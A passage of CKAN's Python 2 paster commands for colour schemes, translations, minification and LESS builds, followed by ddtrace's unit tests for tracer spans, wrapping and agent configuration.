except KeyboardInterrupt:
raise
except:
import traceback
traceback.print_exc()
print 'Unknown error: ', url.strip()
output_filename = 'ckan%s.profile' % re.sub('[/?]', '.', url.replace('/', '.'))
profile_command = "profile_url('%s')" % url
cProfile.runctx(profile_command, globals(), locals(), filename=output_filename)
print 'Written profile to: %s' % output_filename
class CreateColorSchemeCommand(CkanCommand):
'''Create or remove a color scheme.
After running this, you'll need to regenerate the css files. See paster's less command for details.
color - creates a random color scheme
color clear - clears any color scheme
color <'HEX'> - uses as base color eg '#ff00ff' must be quoted.
color <VALUE> - a float between 0.0 and 1.0 used as base hue
color <COLOR_NAME> - html color name used for base color eg lightblue
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
rules = [
'@layoutLinkColor',
'@mastheadBackgroundColor',
'@btnPrimaryBackground',
'@btnPrimaryBackgroundHighlight',
]
# list of predefined colors
color_list = {
'aliceblue': '#f0fff8',
'antiquewhite': '#faebd7',
'aqua': '#00ffff',
'aquamarine': '#7fffd4',
'azure': '#f0ffff',
'beige': '#f5f5dc',
'bisque': '#ffe4c4',
'black': '#000000',
'blanchedalmond': '#ffebcd',
'blue': '#0000ff',
'blueviolet': '#8a2be2',
'brown': '#a52a2a',
'burlywood': '#deb887',
'cadetblue': '#5f9ea0',
'chartreuse': '#7fff00',
'chocolate': '#d2691e',
'coral': '#ff7f50',
'cornflowerblue': '#6495ed',
'cornsilk': '#fff8dc',
'crimson': '#dc143c',
'cyan': '#00ffff',
'darkblue': '#00008b',
'darkcyan': '#008b8b',
'darkgoldenrod': '#b8860b',
'darkgray': '#a9a9a9',
'darkgrey': '#a9a9a9',
'darkgreen': '#006400',
'darkkhaki': '#bdb76b',
'darkmagenta': '#8b008b',
'darkolivegreen': '#556b2f',
'darkorange': '#ff8c00',
'darkorchid': '#9932cc',
'darkred': '#8b0000',
'darksalmon': '#e9967a',
'darkseagreen': '#8fbc8f',
'darkslateblue': '#483d8b',
'darkslategray': '#2f4f4f',
'darkslategrey': '#2f4f4f',
'darkturquoise': '#00ced1',
'darkviolet': '#9400d3',
'deeppink': '#ff1493',
'deepskyblue': '#00bfff',
'dimgray': '#696969',
'dimgrey': '#696969',
'dodgerblue': '#1e90ff',
'firebrick': '#b22222',
'floralwhite': '#fffaf0',
'forestgreen': '#228b22',
'fuchsia': '#ff00ff',
'gainsboro': '#dcdcdc',
'ghostwhite': '#f8f8ff',
'gold': '#ffd700',
'goldenrod': '#daa520',
'gray': '#808080',
'grey': '#808080',
'green': '#008000',
'greenyellow': '#adff2f',
'honeydew': '#f0fff0',
'hotpink': '#ff69b4',
'indianred ': '#cd5c5c',
'indigo ': '#4b0082',
'ivory': '#fffff0',
'khaki': '#f0e68c',
'lavender': '#e6e6fa',
'lavenderblush': '#fff0f5',
'lawngreen': '#7cfc00',
'lemonchiffon': '#fffacd',
'lightblue': '#add8e6',
'lightcoral': '#f08080',
'lightcyan': '#e0ffff',
'lightgoldenrodyellow': '#fafad2',
'lightgray': '#d3d3d3',
'lightgrey': '#d3d3d3',
'lightgreen': '#90ee90',
'lightpink': '#ffb6c1',
'lightsalmon': '#ffa07a',
'lightseagreen': '#20b2aa',
'lightskyblue': '#87cefa',
'lightslategray': '#778899',
'lightslategrey': '#778899',
'lightsteelblue': '#b0c4de',
'lightyellow': '#ffffe0',
'lime': '#00ff00',
'limegreen': '#32cd32',
'linen': '#faf0e6',
'magenta': '#ff00ff',
'maroon': '#800000',
'mediumaquamarine': '#66cdaa',
'mediumblue': '#0000cd',
'mediumorchid': '#ba55d3',
'mediumpurple': '#9370d8',
'mediumseagreen': '#3cb371',
'mediumslateblue': '#7b68ee',
'mediumspringgreen': '#00fa9a',
'mediumturquoise': '#48d1cc',
'mediumvioletred': '#c71585',
'midnightblue': '#191970',
'mintcream': '#f5fffa',
'mistyrose': '#ffe4e1',
'moccasin': '#ffe4b5',
'navajowhite': '#ffdead',
'navy': '#000080',
'oldlace': '#fdf5e6',
'olive': '#808000',
'olivedrab': '#6b8e23',
'orange': '#ffa500',
'orangered': '#ff4500',
'orchid': '#da70d6',
'palegoldenrod': '#eee8aa',
'palegreen': '#98fb98',
'paleturquoise': '#afeeee',
'palevioletred': '#d87093',
'papayawhip': '#ffefd5',
'peachpuff': '#ffdab9',
'peru': '#cd853f',
'pink': '#ffc0cb',
'plum': '#dda0dd',
'powderblue': '#b0e0e6',
'purple': '#800080',
'red': '#ff0000',
'rosybrown': '#bc8f8f',
'royalblue': '#4169e1',
'saddlebrown': '#8b4513',
'salmon': '#fa8072',
'sandybrown': '#f4a460',
'seagreen': '#2e8b57',
'seashell': '#fff5ee',
'sienna': '#a0522d',
'silver': '#c0c0c0',
'skyblue': '#87ceeb',
'slateblue': '#6a5acd',
'slategray': '#708090',
'slategrey': '#708090',
'snow': '#fffafa',
'springgreen': '#00ff7f',
'steelblue': '#4682b4',
'tan': '#d2b48c',
'teal': '#008080',
'thistle': '#d8bfd8',
'tomato': '#ff6347',
'turquoise': '#40e0d0',
'violet': '#ee82ee',
'wheat': '#f5deb3',
'white': '#ffffff',
'whitesmoke': '#f5f5f5',
'yellow': '#ffff00',
'yellowgreen': '#9acd32',
}
def create_colors(self, hue, num_colors=5, saturation=None, lightness=None):
if saturation is None:
saturation = 0.9
if lightness is None:
lightness = 40
else:
lightness *= 100
import math
saturation -= math.trunc(saturation)
print hue, saturation
import colorsys
''' Create n related colours '''
colors=[]
for i in xrange(num_colors):
ix = i * (1.0/num_colors)
_lightness = (lightness + (ix * 40))/100.
if _lightness > 1.0:
_lightness = 1.0
color = colorsys.hls_to_rgb(hue, _lightness, saturation)
hex_color = '#'
for part in color:
hex_color += '%02x' % int(part * 255)
# check and remove any bad values
if not re.match('^\#[0-9a-f]{6}$', hex_color):
hex_color='#FFFFFF'
colors.append(hex_color)
return colors
def command(self):
hue = None
saturation = None
lightness = None
path = os.path.dirname(__file__)
path = os.path.join(path, '..', 'public', 'base', 'less', 'custom.less')
if self.args:
arg = self.args[0]
rgb = None
if arg == 'clear':
os.remove(path)
print 'custom colors removed.'
elif arg.startswith('#'):
color = arg[1:]
if len(color) == 3:
rgb = [int(x, 16) * 16 for x in color]
elif len(color) == 6:
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
print 'ERROR: invalid color'
elif arg.lower() in self.color_list:
color = self.color_list[arg.lower()][1:]
rgb = [int(x, 16) for x in re.findall('..', color)]
else:
try:
hue = float(self.args[0])
except ValueError:
print 'ERROR argument `%s` not recognised' % arg
if rgb:
import colorsys
hue, lightness, saturation = colorsys.rgb_to_hls(*rgb)
lightness = lightness / 340
# deal with greys
if not (hue == 0.0 and saturation == 0.0):
saturation = None
else:
import random
hue = random.random()
if hue is not None:
f = open(path, 'w')
colors = self.create_colors(hue, saturation=saturation, lightness=lightness)
for i in xrange(len(self.rules)):
f.write('%s: %s;\n' % (self.rules[i], colors[i]))
print '%s: %s;\n' % (self.rules[i], colors[i])
f.close
print 'Color scheme has been created.'
print 'Make sure less is run for changes to take effect.'
class TranslationsCommand(CkanCommand):
'''Translation helper functions
trans js - generate the javascript translations
trans mangle - mangle the zh_TW translations for testing
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 1
def command(self):
self._load_config()
from pylons import config
self.ckan_path = os.path.join(os.path.dirname(__file__), '..')
i18n_path = os.path.join(self.ckan_path, 'i18n')
self.i18n_path = config.get('ckan.i18n_directory', i18n_path)
command = self.args[0]
if command == 'mangle':
self.mangle_po()
elif command == 'js':
self.build_js_translations()
else:
print 'command not recognised'
def po2dict(self, po, lang):
'''Convert po object to dictionary data structure (ready for JSON).
This function is from pojson
https://bitbucket.org/obviel/pojson
Copyright (c) 2010, Fanstatic Developers
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the <organization> nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL FANSTATIC DEVELOPERS BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
result = {}
result[''] = {}
result['']['plural-forms'] = po.metadata['Plural-Forms']
result['']['lang'] = lang
result['']['domain'] = 'ckan'
for entry in po:
if entry.obsolete:
continue
# check if used in js file we only include these
occurrences = entry.occurrences
js_use = False
for occurrence in occurrences:
if occurrence[0].endswith('.js'):
js_use = True
continue
if not js_use:
continue
if entry.msgstr:
result[entry.msgid] = [None, entry.msgstr]
elif entry.msgstr_plural:
plural = [entry.msgid_plural]
result[entry.msgid] = plural
ordered_plural = sorted(entry.msgstr_plural.items())
for order, msgstr in ordered_plural:
plural.append(msgstr)
return result
def build_js_translations(self):
import polib
import simplejson as json
def create_js(source, lang):
print 'Generating', lang
po = polib.pofile(source)
data = self.po2dict(po, lang)
data = json.dumps(data, sort_keys=True,
ensure_ascii=False, indent=2 * ' ')
out_dir = os.path.abspath(os.path.join(self.ckan_path, 'public',
'base', 'i18n'))
out_file = open(os.path.join(out_dir, '%s.js' % lang), 'w')
out_file.write(data.encode('utf-8'))
out_file.close()
for l in os.listdir(self.i18n_path):
if os.path.isdir(os.path.join(self.i18n_path, l)):
f = os.path.join(self.i18n_path, l, 'LC_MESSAGES', 'ckan.po')
create_js(f, l)
print 'Completed generating JavaScript translations'
def mangle_po(self):
''' This will mangle the zh_TW translations for translation coverage
testing.
NOTE: This will destroy the current translations fot zh_TW
'''
import polib
pot_path = os.path.join(self.i18n_path, 'ckan.pot')
po = polib.pofile(pot_path)
# we don't want to mangle the following items in strings
# %(...)s %s %0.3f %1$s %2$0.3f [1:...] {...} etc
# sprintf bit after %
spf_reg_ex = "\+?(0|'.)?-?\d*(.\d*)?[\%bcdeufosxX]"
extract_reg_ex = '(\%\([^\)]*\)' + spf_reg_ex + \
'|\[\d*\:[^\]]*\]' + \
'|\{[^\}]*\}' + \
'|<[^>}]*>' + \
'|\%((\d)*\$)?' + spf_reg_ex + ')'
for entry in po:
msg = entry.msgid.encode('utf-8')
matches = re.finditer(extract_reg_ex, msg)
length = len(msg)
position = 0
translation = u''
for match in matches:
translation += '-' * (match.start() - position)
position = match.end()
translation += match.group(0)
translation += '-' * (length - position)
entry.msgstr = translation
out_dir = os.path.join(self.i18n_path, 'zh_TW', 'LC_MESSAGES')
try:
os.makedirs(out_dir)
except OSError:
pass
po.metadata['Plural-Forms'] = "nplurals=1; plural=0\n"
out_po = os.path.join(out_dir, 'ckan.po')
out_mo = os.path.join(out_dir, 'ckan.mo')
po.save(out_po)
po.save_as_mofile(out_mo)
print 'zh_TW has been mangled'
class MinifyCommand(CkanCommand):
'''Create minified versions of the given Javascript and CSS files.
Usage:
paster minify [--clean] PATH
for example:
paster minify ckan/public/base
paster minify ckan/public/base/css/*.css
paster minify ckan/public/base/css/red.css
if the --clean option is provided any minified files will be removed.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 1
exclude_dirs = ['vendor']
def __init__(self, name):
super(MinifyCommand, self).__init__(name)
self.parser.add_option('--clean', dest='clean',
action='store_true', default=False, help='remove any minified files in the path')
def command(self):
clean = getattr(self.options, 'clean', False)
self._load_config()
for base_path in self.args:
if os.path.isfile(base_path):
if clean:
self.clear_minifyed(base_path)
else:
self.minify_file(base_path)
elif os.path.isdir(base_path):
for root, dirs, files in os.walk(base_path):
dirs[:] = [d for d in dirs if not d in self.exclude_dirs]
for filename in files:
path = os.path.join(root, filename)
if clean:
self.clear_minifyed(path)
else:
self.minify_file(path)
else:
# Path is neither a file or a dir?
continue
def clear_minifyed(self, path):
path_only, extension = os.path.splitext(path)
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
if path_only.endswith('.min'):
print 'removing %s' % path
os.remove(path)
def minify_file(self, path):
'''Create the minified version of the given file.
If the file is not a .js or .css file (e.g. it's a .min.js or .min.css
file, or it's some other type of file entirely) it will not be
minifed.
:param path: The path to the .js or .css file to minify
'''
path_only, extension = os.path.splitext(path)
if path_only.endswith('.min'):
# This is already a minified file.
return
if extension not in ('.css', '.js'):
# This is not a js or css file.
return
path_min = fanstatic_resources.min_path(path)
source = open(path, 'r').read()
f = open(path_min, 'w')
if path.endswith('.css'):
f.write(rcssmin.cssmin(source))
elif path.endswith('.js'):
f.write(rjsmin.jsmin(source))
f.close()
print "Minified file '{0}'".format(path)
class LessCommand(CkanCommand):
'''Compile all root less documents into their CSS counterparts
Usage:
paster less
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self.less()
custom_css = {
'fuchsia': '''
@layoutLinkColor: #E73892;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'green': '''
@layoutLinkColor: #2F9B45;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'red': '''
@layoutLinkColor: #C14531;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
'maroon': '''
@layoutLinkColor: #810606;
@footerTextColor: mix(#FFF, @layoutLinkColor, 60%);
@footerLinkColor: @footerTextColor;
@mastheadBackgroundColor: @layoutLinkColor;
@btnPrimaryBackground: lighten(@layoutLinkColor, 10%);
@btnPrimaryBackgroundHighlight: @layoutLinkColor;
''',
}
def less(self):
''' Compile less files '''
import subprocess
command = 'npm bin'
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
directory = output[0].strip()
less_bin = os.path.join(directory, 'lessc')
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
custom_less = os.path.join(root, 'less', 'custom.less')
for color in self.custom_css:
f = open(custom_less, 'w')
f.write(self.custom_css[color])
f.close()
self.compile_less(root, less_bin, color)
f = open(custom_less, 'w')
f.write('// This file is needed in order for ./bin/less to compile in less 1.3.1+\n')
f.close()
self.compile_less(root, less_bin, 'main')
def compile_less(self, root, less_bin, color):
print 'compile %s.css' % color
import subprocess
main_less = os.path.join(root, 'less', 'main.less')
main_css = os.path.join(root, 'css', '%s.css' % color)
command = '%s %s %s' % (less_bin, main_less, main_css)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
output = process.communicate()
class FrontEndBuildCommand(CkanCommand):
'''Creates and minifies css and JavaScript files
Usage:
paster front-end-build
'''
summary = __doc__.split('\n')[0]
usage = __doc__
min_args = 0
def command(self):
self._load_config()
# Less css
cmd = LessCommand('less')
cmd.command()
# js translation strings
cmd = TranslationsCommand('trans')
cmd.options = self.options
cmd.args = ('js',)
cmd.command()
# minification
cmd = MinifyCommand('minify')
cmd.options = self.options
root = os.path.join(os.path.dirname(__file__), '..', 'public', 'base')
root = os.path.abspath(root)
ckanext = os.path.join(os.path.dirname(__file__), '..', '..', 'ckanext')
ckanext = os.path.abspath(ckanext)
cmd.args = (root, ckanext)
cmd.command()
|
test_tracer.py
|
# -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import mock
import pytest
import six
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.tracer import _has_aws_lambda_agent_extension
from ddtrace.tracer import _in_aws_lambda
from tests.subprocesstest import run_in_subprocess
from tests.utils import TracerTestCase
from tests.utils import override_global_config
from ..utils import override_env
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.current_trace_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
ctx = self.tracer.context_provider.active()
assert ctx is None
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.tracer.start_span("web.request")
assert span.name == "web.request"
assert span.parent_id is None
span.finish()
spans = self.pop_spans()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=None,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_dogstatsd_url_host_port(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="foo:1234")
assert tracer.writer.dogstatsd.host == "foo"
assert tracer.writer.dogstatsd.port == 1234
def test_configure_dogstatsd_url_socket(self):
tracer = Tracer()
tracer.configure(dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
tracer = Tracer()
writer = AgentWriter("http://localhost:8126")
tracer.configure(writer=writer, dogstatsd_url="unix:///foo.sock")
assert tracer.writer.dogstatsd.host is None
assert tracer.writer.dogstatsd.port is None
assert tracer.writer.dogstatsd.socket_path == "/foo.sock"
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.agent_url == "http://localhost:8126"
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer.agent_url == "http://foobar:12"
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer.agent_url == "unix:///foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer.agent_url == "http://localhost"
t = ddtrace.Tracer(url="https://localhost")
assert t.writer.agent_url == "https://localhost"
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert (
str(e.value) == "Unsupported protocol 'foo' in Agent URL 'foo://foobar:12'. Must be one of: http, https, unix"
)
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_has_calls(
[
mock.call(timeout=None),
mock.call(timeout=None),
]
)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Stop should be called when replacing the writer.
t.configure(hostname="localhost", port=8126)
assert orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t.writer.dogstatsd.host == "localhost"
assert t.writer.dogstatsd.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t.writer.dogstatsd.host == "foobar"
assert t.writer.dogstatsd.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t.writer.dogstatsd.socket_path == "/var/run/statsd.sock"
